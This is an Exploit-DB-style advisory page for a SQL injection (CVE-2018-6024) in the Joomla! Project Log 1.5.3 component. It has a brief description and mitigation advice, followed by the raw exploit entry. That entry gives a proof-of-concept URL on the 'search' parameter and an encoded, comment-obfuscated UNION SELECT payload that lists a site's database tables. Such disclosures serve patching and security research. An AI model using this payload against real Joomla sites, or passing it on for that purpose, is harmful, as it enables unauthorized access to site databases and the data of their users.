Joomla! Component Project Log 1.5.3 - SQL Injection

vendor:

Project Log

by:

Ihsan Sencan

9.8

CVSS

CRITICAL

SQL Injection

CWE

Product Name: Project Log

Affected Version From: 1.5.3

Affected Version To: 1.5.3

Patch Exists: YES

Related CWE: CVE-2018-6024

CPE: a:thethinkery:project_log:1.5.3

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: WiN7_x64/KaLiLinuX_x64

2018

Joomla! Component Project Log 1.5.3 – SQL Injection

Joomla! Component Project Log 1.5.3 is vulnerable to SQL Injection. An attacker can inject malicious SQL queries via the 'search' parameter in the 'index.php' file. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. This can be used to bypass authentication and gain access to unauthorized data.

Mitigation:

Developers should ensure that user-supplied input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

# # # #
# Exploit Title: Joomla! Component Project Log 1.5.3 - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://extensions.thethinkery.net/
# Software Link: https://extensions.joomla.org/extensions/extension/clients-a-communities/project-a-task-management/project-log/
# Version: 1.5.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-6024
# # # #
# Exploit Author: Ihsan Sencan 
# # # # 
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_projectlog&view=cat&search=[SQL]
#  
# JTJkJTYxJTI3JTIwJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTU1JTRlJTQ5JTRmJTRlJTJhJTJmJTIwJTJmJTJhJTIxJTMxJTMzJTMzJTMzJTM3JTUzJTQ1JTRjJTQ1JTQzJTU0JTJhJTJmJTIwJTMxJTJjJTMyJTJjJTMzJTJjJTI4JTUzJTQ1JTRjJTQ1JTQzJTU0JTIwJTQ3JTUyJTRmJTU1JTUwJTVmJTQzJTRmJTRlJTQzJTQxJTU0JTI4JTc0JTYxJTYyJTZjJTY1JTVmJTZlJTYxJTZkJTY1JTIwJTUzJTQ1JTUwJTQxJTUyJTQxJTU0JTRmJTUyJTIwJTMwJTc4JTMzJTYzJTM2JTMyJTM3JTMyJTMzJTY1JTI5JTIwJTQ2JTUyJTRmJTRkJTIwJTQ5JTRlJTQ2JTRmJTUyJTRkJTQxJTU0JTQ5JTRmJTRlJTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTJlJTU0JTQxJTQyJTRjJTQ1JTUzJTIwJTU3JTQ4JTQ1JTUyJTQ1JTIwJTU0JTQxJTQyJTRjJTQ1JTVmJTUzJTQzJTQ4JTQ1JTRkJTQxJTNkJTQ0JTQxJTU0JTQxJTQyJTQxJTUzJTQ1JTI4JTI5JTI5JTJjJTM1JTJjJTM2JTJjJTM3JTJjJTM4JTJjJTM5JTJjJTMxJTMwJTJjJTMxJTMxJTJjJTMxJTMyJTJjJTMxJTMzJTJjJTMxJTM0JTJjJTMxJTM1JTJjJTMxJTM2JTJjJTMxJTM3JTJjJTMxJTM4JTJjJTMxJTM5JTJjJTMyJTMwJTJjJTMyJTMxJTJjJTMyJTMyJTJjJTMyJTMzJTJjJTMyJTM0JTJjJTMyJTM1JTJjJTMyJTM2JTJjJTMyJTM3JTJjJTMyJTM4JTJjJTMyJTM5JTJjJTMzJTMwJTJkJTJkJTIwJTJk
#    
# # # #